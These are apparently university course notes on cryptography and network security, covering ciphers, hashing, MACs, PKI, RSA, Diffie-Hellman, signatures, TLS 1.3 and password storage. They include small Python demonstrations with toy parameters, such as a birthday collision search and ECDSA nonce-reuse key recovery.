CS 459: Privacy, Cryptography, Network and Data Security
Daniel Vogel
Estimated study time: 2 hr 48 min
Sources and References
Primary references — Dan Boneh and Victor Shoup, A Graduate Course in Applied Cryptography (freely available at toc.cryptobook.us); Cynthia Dwork and Aaron Roth, The Algorithmic Foundations of Differential Privacy, Foundations and Trends in Theoretical Computer Science, 2014.
Supplementary texts — Alfred J. Menezes, Paul C. van Oorschot, and Scott A. Vanstone, Handbook of Applied Cryptography (freely available at cacr.math.uwaterloo.ca/hac); Ross Anderson, Security Engineering, 3rd ed., Wiley, 2020; Arvind Narayanan et al., A Primer on Data Science and Privacy (Princeton).
Online resources — Cloudflare blog on cryptography engineering; Google Project Zero blog; Tor Project design documents; NIST Cybersecurity Framework; Latanya Sweeney’s k-anonymity and re-identification work; Cynthia Dwork’s differential privacy original paper (ICALP 2006).
Chapter 1: Cryptographic Foundations
Cryptography is the mathematical backbone of modern security. Before examining specific protocols, it helps to state precisely what security goals cryptography pursues and what assumptions underlie its guarantees.
Security Goals and Threat Models
The classical security goals are confidentiality (only intended parties can read plaintext), integrity (data has not been altered in transit or at rest), authenticity (the claimed sender is the true sender), and non-repudiation (a sender cannot later deny having sent a message). Real systems often need all four simultaneously.
Kerckhoffs’ principle states that a cryptosystem should be secure even if everything about the system, except the key, is public knowledge. Equivalently, security must never depend on secrecy of the algorithm — only secrecy of the key. This principle underpins modern cryptographic design: algorithms such as AES and RSA are fully public, yet remain secure because breaking them requires knowing the key.
A threat model formalises what an adversary can do: observe ciphertexts (ciphertext-only attack), choose plaintexts and observe their encryptions (chosen-plaintext attack, CPA), or adaptively choose ciphertexts and observe decryptions (chosen-ciphertext attack, CCA). IND-CCA2 — indistinguishability under adaptive chosen-ciphertext attack — is the gold standard for encryption schemes.
Symmetric Encryption
Symmetric encryption uses the same key for encryption and decryption. The one-time pad achieves information-theoretic security: \(c = m \oplus k\) with a uniformly random key as long as the message. It is perfectly secure but impractical at scale because the key is as long as the message and must never be reused.
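The construction is a one-liner; a minimal sketch (function names are mine), using `os.urandom` for the key:

```python
import os

def otp_encrypt(message: bytes, key: bytes) -> bytes:
    # Perfect secrecy requires len(key) == len(message) and a fresh key per message.
    assert len(key) == len(message)
    return bytes(m ^ k for m, k in zip(message, key))

msg = b"attack at dawn"
key = os.urandom(len(msg))
ct = otp_encrypt(msg, key)

# Decryption is the same operation: (m XOR k) XOR k == m.
assert otp_encrypt(ct, key) == msg
```

Reusing the key even once leaks \(m_1 \oplus m_2\) to an eavesdropper, which is why the pad must be truly one-time.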
Stream ciphers approximate the one-time pad using a pseudorandom keystream generated from a short key and nonce. AES-CTR mode turns a block cipher into a stream cipher by encrypting successive counter values and XORing with plaintext.
Block ciphers operate on fixed-size blocks. AES (Advanced Encryption Standard) operates on 128-bit blocks with 128-, 192-, or 256-bit keys through a substitution-permutation network. The mode of operation determines how a block cipher encrypts messages longer than one block:
| Mode | Confidentiality | Parallelisable | Notes |
|---|---|---|---|
| ECB | Broken | Yes | Identical blocks → identical ciphertexts; never use |
| CBC | Secure (with random IV) | Decrypt only | Padding oracle attacks if unauthenticated |
| CTR | Secure (with unique nonce) | Yes | Stream cipher from block cipher |
| GCM | Secure + authenticated | Yes | AEAD; nonce reuse is catastrophic |
ECB mode is famously insecure: encrypting the same plaintext block always produces the same ciphertext block, leaking patterns (the “ECB penguin” illustration). GCM is the preferred mode for new systems.
AES-GCM proceeds in two conceptual steps. First, confidentiality via CTR mode: the nonce is combined with a counter to form successive 128-bit blocks, each encrypted with AES to produce a keystream; the keystream is XOR’d with the plaintext to produce ciphertext \(C\) of the same length as the plaintext. Second, integrity via GHASH: the ciphertext (and any additional authenticated data, such as a packet header) is processed by GHASH, a polynomial hash over GF(\(2^{128}\)), to produce a 128-bit authentication tag \(T\). The recipient verifies \(T\) before decrypting; if \(T\) is wrong, the ciphertext is rejected without any plaintext being exposed.
The output of the encryption is the pair \((C, T)\): the ciphertext (same length as the plaintext) plus the tag (always 16 bytes). Contrast with AES-CBC: CBC adds PKCS#7 padding, so a 13-byte message produces 16 bytes of ciphertext (padding to the block boundary), and produces no tag — a separate HMAC must be appended manually, and it must be verified before decryption to avoid padding oracle attacks. Failure to follow this encrypt-then-MAC ordering was the root cause of POODLE (CBC padding oracle over SSL 3.0, 2014) and Lucky Thirteen (CBC MAC-timing attack on TLS, 2013). AES-GCM eliminates this class of vulnerabilities by construction.
Two decades after Bleichenbacher’s original 1998 padding oracle attack on RSA PKCS#1 v1.5 encryption, the ROBOT vulnerability (Return Of Bleichenbacher’s Oracle Threat, 2018) found that 27% of the HTTPS servers for the top 100 websites were still vulnerable to variations of the same attack, despite decades of warnings. The correct response is to use AEAD: TLS 1.3 removed all non-AEAD cipher suites, leaving AES-GCM and ChaCha20-Poly1305 as the suites in common use. Neither can be attacked in this way because any modification to the ciphertext causes tag verification to fail before any decryption occurs.
Concretely: encrypt the 16-byte block “Hello World!\x04\x04\x04\x04” (the 12-byte string padded to the block boundary with PKCS#7) under the all-zero key \(K = 0\text{x}00000000\ldots00\). The output is a 16-byte ciphertext block with no visible structure, even though the plaintext is entirely ASCII. This pseudo-random appearance holds regardless of how structured the plaintext is: AES’s design ensures that changing even one bit of \(P\) or \(K\) avalanches through all output bits. The strict avalanche criterion means that, on average, half of the output bits flip when one input bit changes.
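The avalanche effect is easy to observe empirically. The sketch below uses SHA-256 (available in Python’s standard library, unlike AES) as a stand-in, since both primitives are designed to the same criterion: flipping one input bit should flip about half of the output bits.

```python
import hashlib

def bit_diff(a: bytes, b: bytes) -> int:
    # Count differing bits between two equal-length byte strings.
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))

p1 = b"Hello World!"
p2 = bytes([p1[0] ^ 0x01]) + p1[1:]   # flip exactly one bit of the input

h1 = hashlib.sha256(p1).digest()
h2 = hashlib.sha256(p2).digest()

# 256 output bits; a good avalanche flips ~128 of them on average.
print(bit_diff(h1, h2))
```

Running this for many single-bit flips and averaging converges on 128, half of the 256 output bits.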
A concrete illustration of why IND-CPA alone is insufficient: suppose encryption is deterministic (the same plaintext always produces the same ciphertext). Eve observes a challenge ciphertext \(c^*\). She guesses that the plaintext is \(m'\), queries the encryption oracle for \(\mathsf{Enc}(m')\), and compares to \(c^*\). If they match, she has identified the plaintext with certainty. IND-CPA security prevents this only if encryption is randomized — two encryptions of the same message look different. Schemes like AES-CBC with a random IV and AES-GCM with a random nonce achieve this; textbook RSA and AES-ECB do not.
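Eve’s guessing attack takes three lines. The sketch below uses HMAC under a fixed key as a stand-in for an arbitrary deterministic cipher — the attack never needs to decrypt, only to compare ciphertexts:

```python
import hmac, hashlib, os

key = os.urandom(16)

def det_enc(m: bytes) -> bytes:
    # Stand-in for any deterministic scheme: same (key, message) -> same ciphertext.
    return hmac.new(key, m, hashlib.sha256).digest()

# Eve knows the challenge plaintext is one of two values.
m0, m1 = b"SELL", b"BUY!"
challenge = det_enc(m1)           # victim encrypts m1

# Eve queries the encryption oracle on both candidates and compares.
guess = m0 if det_enc(m0) == challenge else m1
assert guess == m1                # identified with certainty
```

With a randomized scheme, two encryptions of the same message differ, so the comparison tells Eve nothing.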
Authenticated Encryption and the Cryptographic Doom Principle
Encryption alone provides confidentiality but not integrity. An attacker can flip ciphertext bits, causing predictable changes in decrypted plaintext. Authenticated Encryption with Associated Data (AEAD) combines confidentiality and integrity in a single primitive.
The Cryptographic Doom Principle, articulated by Moxie Marlinspike, states: if you have to perform any cryptographic operation before verifying the MAC on a message you’ve received, it will somehow be used to destroy you. Concretely: always verify the MAC before decrypting. Systems that decrypt first and authenticate second are vulnerable to padding oracle and CBC timing attacks (e.g., the POODLE and Lucky Thirteen attacks on SSL/TLS). The correct composition is Encrypt-then-MAC.
AES-GCM authenticates both the ciphertext and associated data (e.g., packet headers) using GHASH over GF(\(2^{128}\)). ChaCha20-Poly1305 is a software-friendly alternative resistant to timing attacks, used in TLS 1.3 and WireGuard.
Pseudorandom Functions and Generators
The existence of PRGs (and PRFs) cannot be proven unconditionally — it requires computational hardness assumptions (e.g., the hardness of factoring or discrete log). The connections among PRGs, PRFs, and block ciphers form the core of provable symmetric-key security.
Hash Functions
A cryptographic hash function \(H: \{0,1\}^* \to \{0,1\}^n\) must satisfy:
- Collision resistance: computationally infeasible to find \(x \neq x'\) with \(H(x) = H(x')\)
- Preimage resistance: given \(y\), computationally infeasible to find \(x\) with \(H(x) = y\)
- Second-preimage resistance: given \(x\), computationally infeasible to find \(x' \neq x\) with \(H(x') = H(x)\)
SHA-1 (160-bit output) was broken in 2017 by the SHAttered attack (Stevens et al.), which produced two PDF files with the same SHA-1 hash using approximately \(2^{63.1}\) operations — far below the generic \(2^{80}\) birthday bound. This had practical implications: TLS certificates signed with SHA-1 could be forged, which is why all major CAs stopped issuing SHA-1 certificates by 2016. SHA-2 (SHA-256, SHA-512) and SHA-3 (Keccak, sponge construction) are currently secure.
For example, SHA-256 of the string “Hello” is 185f8db32271fe25f561a6fc938b2e264306ec304eda518007d1764826381969 — 64 hexadecimal characters, each representing 4 bits. This compact digest has three security properties: (1) preimage resistance — given only the digest 185f…, there is no efficient algorithm to find any string that hashes to it; (2) second-preimage resistance — given “Hello” itself, one cannot efficiently find a different string that hashes to the same digest; (3) collision resistance — one cannot efficiently find any pair of distinct strings \(x \neq x'\) such that SHA-256(\(x\)) = SHA-256(\(x'\)).
The current hash landscape: MD5 (128-bit) has had practical collisions since 2004 (Wang and Yu); collisions can now be computed on a laptop in seconds using HashClash. SHA-1 (160-bit) fell to collisions in 2017 (SHAttered). Both are completely broken for integrity purposes, though MD5 is still seen in checksums where collision resistance is not required (because a file publisher controls both files). Only SHA-2 (SHA-256, SHA-512) and SHA-3 (Keccak, sponge construction) are currently considered secure for all three properties. NIST standardised SHA-3 in 2015 as a structural backup in case weaknesses were discovered in SHA-2’s Merkle-Damgård construction.
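The digest can be reproduced with Python’s hashlib:

```python
import hashlib

digest = hashlib.sha256(b"Hello").hexdigest()
print(digest)                    # 64 hex characters = 256 bits
assert len(digest) == 64

# Even a one-character change ("Hello" -> "hello") yields an unrelated digest.
other = hashlib.sha256(b"hello").hexdigest()
assert other != digest
```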
By the birthday paradox, after \(k\) random evaluations of an \(n\)-bit hash, \(\Pr[\text{collision}] \approx 1 - e^{-k^2 / 2^{n+1}}\). Setting this to \(1/2\) and solving gives \(k \approx \sqrt{2^{n+1} \ln 2} \approx 1.18 \cdot 2^{n/2}\). For SHA-256 (\(n = 256\)): \(k \approx 2^{128}\) evaluations — computationally infeasible for any foreseeable adversary. For MD5 (\(n = 128\)): \(k \approx 2^{64}\) evaluations — feasible with GPU clusters, and in practice the algebraic structure of MD5 makes collisions far cheaper than this generic bound.
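The birthday bound can be observed directly by truncating a hash until collisions become findable. The sketch below (the 16-bit truncation width is my choice) finds a collision after roughly \(2^{16/2} = 256\) evaluations:

```python
import hashlib

def truncated_hash(data: bytes, bits: int = 16) -> int:
    # Keep only the first `bits` bits of SHA-256 so collisions are reachable.
    h = int.from_bytes(hashlib.sha256(data).digest(), "big")
    return h >> (256 - bits)

seen = {}
i = 0
while True:
    d = truncated_hash(str(i).encode())
    if d in seen:
        break                     # str(seen[d]) and str(i) collide
    seen[d] = i
    i += 1

# For a 16-bit hash the first collision typically appears within a small
# multiple of 2^8 = 256 evaluations, not the 2^16 a preimage search needs.
print(f"collision after {i} hashes: inputs {seen[d]} and {i}")
```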
The Merkle-Damgård construction underlies MD5, SHA-1, and SHA-2: a compression function is iterated over message blocks. A weakness is length extension attacks — given \(H(m)\) and \(|m|\), an attacker can compute \(H(m \| \text{padding} \| m')\) without knowing \(m\). SHA-3’s sponge construction avoids this.
Message Authentication Codes
A MAC provides integrity and authenticity in a shared-key setting. HMAC is constructed as \(\text{HMAC}(k, m) = H\big((k \oplus \text{opad}) \,\|\, H((k \oplus \text{ipad}) \,\|\, m)\big)\), which provably avoids length extension vulnerabilities. The birthday bound implies that a MAC with \(n\)-bit output can be forged with approximately \(2^{n/2}\) queries, so short MACs (e.g., 32-bit) are dangerous.
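The HMAC construction is short enough to implement directly and check against the standard library (a sketch, assuming SHA-256 with its 64-byte block size):

```python
import hashlib, hmac

def my_hmac_sha256(key: bytes, msg: bytes) -> bytes:
    block = 64                                  # SHA-256 block size in bytes
    if len(key) > block:
        key = hashlib.sha256(key).digest()      # overlong keys are hashed first
    key = key.ljust(block, b"\x00")             # then zero-padded to block size
    ipad = bytes(b ^ 0x36 for b in key)
    opad = bytes(b ^ 0x5c for b in key)
    inner = hashlib.sha256(ipad + msg).digest()
    return hashlib.sha256(opad + inner).digest()

k, m = b"secret key", b"the message"
assert my_hmac_sha256(k, m) == hmac.new(k, m, hashlib.sha256).digest()
```

The nested hash is what defeats length extension: an attacker who extends the inner hash still cannot compute the outer hash without the key.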
MACs require a shared key and provide no non-repudiation. Digital signatures replace the shared key with asymmetric key pairs and additionally provide non-repudiation — see Chapter 2.
A digital signature (RSA-PSS, ECDSA, Ed25519) is asymmetric: the signing key is private and the verification key is public. Anyone with Alice’s public key can verify that Alice signed the message, but only Alice (the sole holder of the private signing key) can produce a valid signature. This gives non-repudiation: Alice cannot later plausibly deny having signed a document whose signature verifies under her public key. This is why digital signatures underlie certificate authorities, code signing, and legal electronic signatures — while MACs are used for integrity within a session where both parties already share a secret (e.g., HTTPS record-layer integrity after TLS handshake).
Public Key Infrastructure
PKI binds public keys to identities. An X.509 certificate contains the subject’s public key, identity, validity period, and a digital signature from a Certificate Authority (CA). Browsers ship with a trust store of ~100–150 root CAs; any of them can sign certificates for any domain, which creates a systemic risk.
Certificate Transparency (CT) logs (RFC 6962) require CAs to append every issued certificate to append-only, publicly auditable logs. Browsers require a Signed Certificate Timestamp (SCT) proving the certificate appears in a CT log. This makes fraudulent certificates detectable after the fact, though not preventable.
In 2011, the Dutch CA DigiNotar was compromised, and the attacker issued a fraudulent wildcard certificate for *.google.com. This single certificate, trusted by all browsers because DigiNotar was a root CA, allowed an attacker-controlled server to impersonate any Google service — Gmail, Drive, Search — to any user whose browser trusted DigiNotar. Because TLS certificate validation only checks that the signature is from a trusted CA, not that the CA is the one who would legitimately issue that certificate, there was no warning to users. The attack was used operationally against Iranian citizens attempting to access Google services — the Iranian government used the fraudulent certificate to perform SSL interception (MITM) at the national ISP level, decrypting Iranian users’ traffic. The compromise was discovered when an Iranian user noticed an unusual certificate error in Chrome. Within days, Mozilla, Google, and Microsoft revoked DigiNotar’s root certificate, instantly making DigiNotar-signed certificates untrusted in all browsers. DigiNotar went bankrupt months later.
This incident directly motivated Certificate Transparency: if CT logs had existed, the fraudulent *.google.com certificate would have appeared in the public log, Google’s automated monitoring would have detected the misissued certificate within minutes, and the CA could have been required to revoke it before it was used operationally.
DANE (DNS-based Authentication of Named Entities, RFC 6698) publishes certificate information in DNSSEC-signed TLSA records: a client querying _443._tcp.example.com can retrieve the fingerprint of the expected certificate directly from DNS, bypassing the CA system entirely. This eliminates the "any CA can issue for any domain" vulnerability: only the domain owner (who controls DNS) can publish TLSA records. The limitation: DANE requires DNSSEC deployment throughout the resolution chain, and DNSSEC adoption by registrars and resolvers has been slow. Approximately 3% of global DNS zones are DNSSEC-signed; DANE over HTTPS sees negligible adoption in the browser ecosystem (though it is used in email — SMTP DANE is deployed by major providers including Google and Cloudflare for mail server certificate validation).

Chapter 2: Public Key Cryptography
Asymmetric cryptography allows two parties who have never met to exchange keys or verify signatures without a pre-shared secret, solving the fundamental key distribution problem.
RSA
RSA key generation: choose large primes \(p, q\); set \(n = pq\); choose \(e\) coprime to \(\phi(n) = (p-1)(q-1)\); compute \(d = e^{-1} \bmod \phi(n)\). The public key is \((n, e)\), private key is \(d\). Encryption: \(c = m^e \bmod n\). Decryption: \(m = c^d \bmod n\).
Textbook RSA (without padding) is insecure. A catalogue of attacks documented in Boneh’s 20-year survey includes:
| Attack | Condition | Consequence |
|---|---|---|
| Small \(e = 3\) | \(m^3 < n\) | Take cube root over integers |
| Coppersmith / small message | \(m < n^{1/e}\) | Recover \(m\) in polynomial time |
| Wiener’s attack | \(d < n^{0.25}\) | Recover \(d\) via continued fractions |
| Common modulus | Same \(n\), two \(e\)’s | Recover plaintext via extended GCD |
| CCA on textbook RSA | Chosen ciphertexts | Trivially malleable |
OAEP (Optimal Asymmetric Encryption Padding) — RSA-OAEP — achieves IND-CCA2 security in the random oracle model by adding randomised padding before encryption.
Public key: \((n, e) = (3233, 17)\). Private key: \(d = 2753\).
Encrypt the message \(m = 65\): \(c = m^e \bmod n = 65^{17} \bmod 3233 = 2790\). Decrypt: \(m = c^d \bmod n = 2790^{2753} \bmod 3233 = 65\). The correctness follows from Euler’s theorem: \(m^{\phi(n)} \equiv 1 \pmod{n}\), so \(m^{de} = m^{1 + k\phi(n)} = m \cdot (m^{\phi(n)})^k \equiv m \pmod{n}\).
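The worked example can be checked with Python’s built-in modular arithmetic:

```python
# Toy parameters from the worked example: p = 61, q = 53.
p, q = 61, 53
n = p * q                      # 3233
phi = (p - 1) * (q - 1)        # 3120
e = 17
d = pow(e, -1, phi)            # modular inverse (Python 3.8+)
assert d == 2753

m = 65
c = pow(m, e, n)               # encryption: m^e mod n
assert c == 2790
assert pow(c, d, n) == m       # decryption: c^d mod n recovers m
```

Real RSA uses 2048-bit or larger moduli; with toy parameters like these, anyone can factor \(n = 3233\) and recover \(d\).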
Why is textbook RSA insecure for encryption? The scheme is deterministic: the same plaintext always produces the same ciphertext. An attacker who knows \(m\) is one of two values \(\{m_0, m_1\}\) can simply encrypt both with the public key and compare to \(c\) — breaking IND-CPA immediately. OAEP adds randomness before encryption, making this attack impossible. For signatures, the analogous weakness is that RSA is multiplicatively homomorphic: given signatures \(\sigma_1 = m_1^d\) and \(\sigma_2 = m_2^d\), one can compute \(\sigma_1 \sigma_2 = (m_1 m_2)^d \bmod n\), a valid signature on \(m_1 m_2\), without knowing \(d\).
Alice chooses a private key \(a = 6\) uniformly at random and computes her public value \(A = g^a \bmod p = 5^6 \bmod 23 = 8\). Bob chooses a private key \(b = 15\) and computes \(B = g^b \bmod p = 5^{15} \bmod 23 = 19\). They exchange \(A = 8\) and \(B = 19\) publicly.
Alice computes the shared secret \(s = B^a \bmod p = 19^6 \bmod 23 = 2\). Bob computes \(s = A^b \bmod p = 8^{15} \bmod 23 = 2\). Both arrive at the same secret \(s = 2 = g^{ab} \bmod p\). An eavesdropper sees \(p = 23\), \(g = 5\), \(A = 8\), \(B = 19\) but must solve the discrete logarithm problem to find \(a\) or \(b\) — computationally infeasible for large \(p\).
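The exchange above can be reproduced with three calls to `pow`:

```python
p, g = 23, 5                   # toy public parameters
a, b = 6, 15                   # Alice's and Bob's private keys

A = pow(g, a, p)               # Alice's public value
B = pow(g, b, p)               # Bob's public value
assert (A, B) == (8, 19)

s_alice = pow(B, a, p)         # Alice: B^a = g^(ab) mod p
s_bob = pow(A, b, p)           # Bob:   A^b = g^(ab) mod p
assert s_alice == s_bob == 2   # same shared secret
```

In practice the shared secret is never used as a key directly; it is fed through a KDF such as HKDF.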
Critically, vanilla DH provides no authentication: a man-in-the-middle can impersonate both Alice and Bob, establishing separate shared secrets with each. This is why DH is always combined with authentication (signatures on the key shares) in protocols like TLS — ephemeral ECDHE key shares are signed by the server’s certificate key.
Discrete Logarithm and Diffie-Hellman
The discrete logarithm problem (DLP): given a prime-order group \(\mathbb{G}\) with generator \(g\) and element \(h = g^x\), find \(x\). This is believed hard for appropriately chosen groups.
Diffie-Hellman key exchange: Alice sends \(g^a\), Bob sends \(g^b\); both compute \(g^{ab}\). The CDH (Computational DH) assumption states computing \(g^{ab}\) from \(g^a, g^b\) is hard; the DDH (Decisional DH) assumption states \(g^{ab}\) is indistinguishable from a random group element.
El-Gamal encryption: to encrypt \(m\) under public key \(h = g^x\), choose random \(r\), send \((g^r, m \cdot h^r)\). Decryption: \(m = c_2 / c_1^x\). El-Gamal is IND-CPA secure under DDH.
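A sketch of El-Gamal with the same toy parameters used earlier (p = 23, g = 5; real deployments use ~2048-bit primes or elliptic-curve groups):

```python
p, g = 23, 5                   # toy group
x = 6                          # private key
h = pow(g, x, p)               # public key h = g^x mod p

def encrypt(m: int, r: int):
    # A fresh random r per message is what makes El-Gamal IND-CPA secure.
    return pow(g, r, p), (m * pow(h, r, p)) % p

def decrypt(c1, c2):
    # c2 / c1^x: the inverse comes via Fermat's little theorem, c1^(p-1-x).
    return (c2 * pow(c1, p - 1 - x, p)) % p

c1, c2 = encrypt(10, r=3)
assert decrypt(c1, c2) == 10
```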
For finite fields \(\mathbb{F}_p^*\), the index calculus algorithm achieves subexponential \(e^{O((\log p)^{1/3} (\log \log p)^{2/3})}\) complexity, requiring 2048-bit primes for 112-bit security. No analogous subexponential algorithm is known for generic elliptic curves.
Elliptic Curve Cryptography
An elliptic curve over \(\mathbb{F}_p\) is the set of points satisfying \(y^2 = x^3 + ax + b\). The group law (point addition) is defined geometrically. ECDH performs Diffie-Hellman in this group; ECDSA and EdDSA provide signatures.
Advantages over finite-field DH: 256-bit ECC keys provide the same security as 3072-bit RSA/DH keys. Commonly used curves include NIST P-256 (widely deployed, but concerns about NIST’s curve constants), and Curve25519 / Ed25519 (designed by Bernstein with fully transparent parameters, faster in software, constant-time implementations available).
Digital Signatures
A signature scheme consists of key generation, signing, and verification. Properties: existential unforgeability under chosen-message attack (EUF-CMA). Key schemes:
- RSA-PSS: randomised padding gives provable security; preferred over PKCS#1 v1.5 for signatures
- ECDSA: \(r = (k \cdot G)_x \bmod n\), \(s = k^{-1}(H(m) + r \cdot d) \bmod n\); nonce reuse catastrophe — if the same \(k\) is used for two signatures, the private key \(d\) is trivially recoverable. Sony’s PS3 used a constant “random” \(k\), allowing Fail0verflow to extract the signing key in 2010.
- EdDSA (Ed25519): deterministic nonce derived from message and private key, eliminating nonce-reuse risk; constant-time implementation; widely adopted (SSH, TLS 1.3)
Signature malleability: in some schemes (ECDSA, early Bitcoin), a valid signature \((r, s)\) has a second valid form \((r, -s \bmod n)\). Bitcoin’s transaction malleability bug exploited this.
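The ECDSA nonce-reuse recovery mentioned above reduces to two linear equations in two unknowns. The sketch below demonstrates only the algebra: \(n\) stands in for the curve order and \(r\) is chosen arbitrarily, since the elliptic curve itself plays no role in the key-recovery step.

```python
# Toy field: a prime standing in for the curve order n.
n = 2**31 - 1
d = 123456789                  # the private key we will "steal"
k = 987654321                  # the reused nonce
r = 55555                      # would be (kG)_x mod n on a real curve

def sign(h: int) -> int:
    # s = k^{-1} (h + r d) mod n
    return (pow(k, -1, n) * (h + r * d)) % n

h1, h2 = 1111, 2222            # hashes of two different messages
s1, s2 = sign(h1), sign(h2)

# Same k and r in both signatures: subtracting eliminates d, giving k,
# and substituting k back gives d.
k_rec = ((h1 - h2) * pow(s1 - s2, -1, n)) % n
d_rec = ((s1 * k_rec - h1) * pow(r, -1, n)) % n
assert (k_rec, d_rec) == (k, d)
```

This is exactly the computation Fail0verflow performed against the PS3’s constant-\(k\) signatures.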
Key Management
HKDF (HMAC-based KDF) derives multiple keying material outputs from a single secret using HMAC. It consists of an Extract step (compress entropy into a pseudorandom key) and an Expand step (derive output key material).
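HKDF is a thin layer over HMAC; a sketch of both steps following RFC 5869 (the label strings below are my choice):

```python
import hashlib, hmac

def hkdf_extract(salt: bytes, ikm: bytes) -> bytes:
    # Extract: compress input keying material into a fixed-size pseudorandom key.
    return hmac.new(salt or b"\x00" * 32, ikm, hashlib.sha256).digest()

def hkdf_expand(prk: bytes, info: bytes, length: int) -> bytes:
    # Expand: T(i) = HMAC(PRK, T(i-1) || info || i), concatenated to `length` bytes.
    okm, t, i = b"", b"", 1
    while len(okm) < length:
        t = hmac.new(prk, t + info + bytes([i]), hashlib.sha256).digest()
        okm += t
        i += 1
    return okm[:length]

prk = hkdf_extract(b"salt", b"input keying material")
k_enc = hkdf_expand(prk, b"encryption", 32)
k_mac = hkdf_expand(prk, b"mac", 32)
assert k_enc != k_mac            # distinct labels yield independent keys
```

The `info` label is what lets one secret safely yield many independent keys (encryption, MAC, IV, ...).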
Forward secrecy (perfect forward secrecy, PFS): compromise of the long-term private key does not compromise past session keys. Achieved by using ephemeral DH/ECDH key pairs per session, discarding them after use. TLS 1.3 mandates ephemeral key exchange; TLS 1.2 optional (ECDHE cipher suites). Without PFS, a passive adversary can record ciphertext traffic and decrypt it years later upon obtaining the private key.
Chapter 3: Network Security
Networks expose cryptographic systems to adversaries who can observe, intercept, and modify traffic. Securing communications requires understanding the entire stack.
The Network Security Landscape
The TCP/IP stack presents distinct attack surfaces at each layer:
| Layer | Attacks |
|---|---|
| Link (Ethernet) | ARP spoofing, VLAN hopping |
| Network (IP) | IP spoofing, ICMP redirect, BGP hijacking |
| Transport (TCP/UDP) | TCP session hijacking, SYN flooding, UDP amplification |
| Application (TLS, HTTP) | Downgrade attacks, injection, CSRF, XSS |
ARP spoofing poisons a local network’s ARP cache, redirecting traffic through the attacker (man-in-the-middle). IP spoofing forges the source IP; useful in amplification DDoS but not for two-way communication because replies go to the spoofed address.
TLS 1.3
TLS 1.3 (RFC 8446, 2018) is a substantial redesign eliminating the weaknesses accumulated in TLS 1.2. Key changes: all non-AEAD cipher suites, RSA key transport, static Diffie-Hellman, compression, and renegotiation were removed; forward secrecy is mandatory; and the handshake completes in one round trip.
The TLS 1.3 handshake:
- Client sends ClientHello with supported cipher suites and key shares (ECDHE public keys).
- Server selects a cipher suite and responds with its ECDHE key share, certificate, and CertificateVerify (a signature over the transcript).
- Both derive the session keys using HKDF over the shared ECDHE secret and handshake transcript.
- All subsequent records are AEAD-protected (AES-GCM or ChaCha20-Poly1305).
0-RTT resumption allows a client to send application data in the first flight using a pre-shared key from a previous session, reducing latency to zero round trips. The security cost is replay attack vulnerability: a network attacker can replay a 0-RTT request. Servers must treat 0-RTT data as idempotent (safe to replay), or reject it for sensitive operations.
Phase 1 — Early Secret: \(\text{ES} = \text{HKDF-Extract}(0, \text{PSK or } 0)\). This absorbs any pre-shared key for 0-RTT; if no PSK, input is the zero string.
Phase 2 — Handshake Secret: \(\text{HS} = \text{HKDF-Extract}(\text{Derive-Secret}(\text{ES}, \ldots), g^{xy})\), where \(g^{xy}\) is the ECDHE shared secret. The client and server handshake traffic keys (for encrypting the handshake after ServerHello) are derived from HS: \(\text{client\_handshake\_traffic\_secret} = \text{Derive-Secret}(\text{HS}, \text{"c hs traffic"}, \text{transcript})\).
Phase 3 — Master Secret: \(\text{MS} = \text{HKDF-Extract}(\text{Derive-Secret}(\text{HS}, \ldots), 0)\). The application data keys are derived from MS: \(\text{client\_application\_traffic\_secret} = \text{Derive-Secret}(\text{MS}, \text{"c ap traffic"}, \text{transcript})\).
Phase 4 — Resumption Secret: Derived from MS for future 0-RTT sessions.
Each party independently computes this key schedule, so session keys are never transmitted. The entire transcript (all handshake messages) is input to each Derive-Secret call — any tampering with any handshake message changes the transcript hash, producing different session keys, and subsequent MAC verification fails. This binding of the key schedule to the transcript prevents downgrade attacks: an attacker who modifies the ClientHello cipher suite list causes the derived keys to differ, breaking the handshake.
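The transcript binding can be illustrated with a simplified sketch of the key schedule. This is not the real RFC 8446 encoding — actual TLS wraps labels in an HkdfLabel structure and feeds precise transcript hashes — but the phase structure and the binding property are the same:

```python
import hashlib, hmac

def hkdf_extract(salt: bytes, ikm: bytes) -> bytes:
    return hmac.new(salt, ikm, hashlib.sha256).digest()

def derive_secret(secret: bytes, label: bytes, transcript: bytes) -> bytes:
    # Simplified Derive-Secret: key = HMAC(secret, label || Hash(transcript)).
    msg = label + hashlib.sha256(transcript).digest()
    return hmac.new(secret, msg, hashlib.sha256).digest()

zeros = b"\x00" * 32
ecdhe = b"shared ECDHE secret (placeholder)"

def session_keys(transcript: bytes) -> bytes:
    early = hkdf_extract(zeros, zeros)                                  # Phase 1 (no PSK)
    hs = hkdf_extract(derive_secret(early, b"derived", b""), ecdhe)     # Phase 2
    ms = hkdf_extract(derive_secret(hs, b"derived", transcript), zeros) # Phase 3
    return derive_secret(ms, b"c ap traffic", transcript)

# Tampering with any handshake message changes the transcript, hence all keys.
assert session_keys(b"ClientHello|ServerHello") != session_keys(b"ClientHello'|ServerHello")
```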
The recurring lesson: any flexibility to negotiate weak parameters is eventually exploited. TLS 1.3’s response was radical: remove all weak algorithms entirely, leaving no negotiation for cipher suites that are known to be broken, and mandate forward secrecy (ephemeral key exchange) for all connections. The design philosophy shifted from “support old stuff for compatibility” to “old clients that can’t do TLS 1.3 simply don’t connect.”
Authentication
Password-based authentication must store passwords securely. Plain storage, MD5 hashing, or SHA-1 hashing are all inadequate: GPU-accelerated cracking can test billions of candidate hashes per second, and precomputed rainbow tables make unsalted hashes cheaper still. The correct approach uses salted, memory-hard key derivation functions:
| Function | Memory-hardness | Notes |
|---|---|---|
| bcrypt | Moderate | CPU-hard; time cost only; FPGA-attackable |
| scrypt | Strong | Memory + CPU hard; Litecoin PoW |
| Argon2id | Best practice | PHC winner 2015; configurable memory, time, parallelism |
Multi-factor authentication (MFA) adds a second factor beyond the password. TOTP (RFC 6238) generates a time-based 6-digit code from a shared HMAC secret: \(\text{TOTP}(k, t) = \text{Truncate}\big(\text{HMAC-SHA1}(k, \lfloor t/30 \rfloor)\big) \bmod 10^6\). FIDO2/WebAuthn uses public-key cryptography tied to the device; it is phishing-resistant because the key is bound to the origin URL.
Credential stuffing automates testing of username-password pairs leaked from one breach against other services, exploiting password reuse. MFA and breach-detection services (HaveIBeenPwned) mitigate this.
